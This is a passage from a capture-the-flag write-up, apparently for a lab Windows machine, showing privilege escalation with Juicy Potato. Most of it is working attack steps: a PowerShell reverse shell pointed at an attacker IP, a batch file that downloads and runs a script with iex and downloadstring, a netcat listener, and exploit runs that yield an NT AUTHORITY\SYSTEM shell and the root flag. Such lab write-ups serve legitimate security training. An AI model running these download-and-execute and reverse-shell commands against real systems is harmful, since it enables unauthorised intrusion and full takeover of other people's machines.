  • -p: the program to run. We'll need a file that sends a reverse shell back to our attack machine.

  • -l: COM server listen port. This can be anything; we'll use 6666.

First copy the Invoke-PowerShellTcp.ps1 script once again into your current directory, this time as pstcp.ps1. Add the following line to the end of the script with the attack configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.3 -Port 6666

When called, this sends a reverse shell back to our attack machine on port 6666. Next, create a shell.bat file that downloads pstcp.ps1 and runs it.

┌──(kali💀kali)-[~/Desktop]
└─$ nano shell.bat 

powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.3:5555/pstcp.ps1')

Then download the shell.bat file on the target machine.

PS C:\Users\Destitute\Desktop> (new-object net.webclient).downloadfile('http://10.10.14.3:5555/shell.bat', 'C:\Users\Destitute\Desktop\shell.bat')

Setup a listener on the attack machine to receive the reverse shell.

┌──(kali💀kali)-[~]
└─$ nc -nlvp 6666

PS C:\Users\Destitute\Desktop> ./jp.exe -t * -p shell.bat -l 6666
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 6666
COM -> recv failed with error: 10038

It fails to escalate with the default CLSID (BITS). The CLSID has to belong to a COM server that activates as SYSTEM on this particular OS version; the Juicy Potato repository ships per-OS lists of usable CLSIDs (and a PowerShell script to enumerate them on the target). Let's pick one from the Windows 10 Enterprise list.

Rerun the Juicy Potato executable with that specific CLSID.

PS C:\Users\Destitute\Desktop> ./jp.exe -p shell.bat -l 6666 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"
┌──(kali💀kali)-[~]
└─$ nc -nlvp 6666
listening on [any] 6666 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.116] 49702
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
nt authority\system

PS C:\Users\Administrator\Desktop> type root.txt
0e5eca-----------------------------
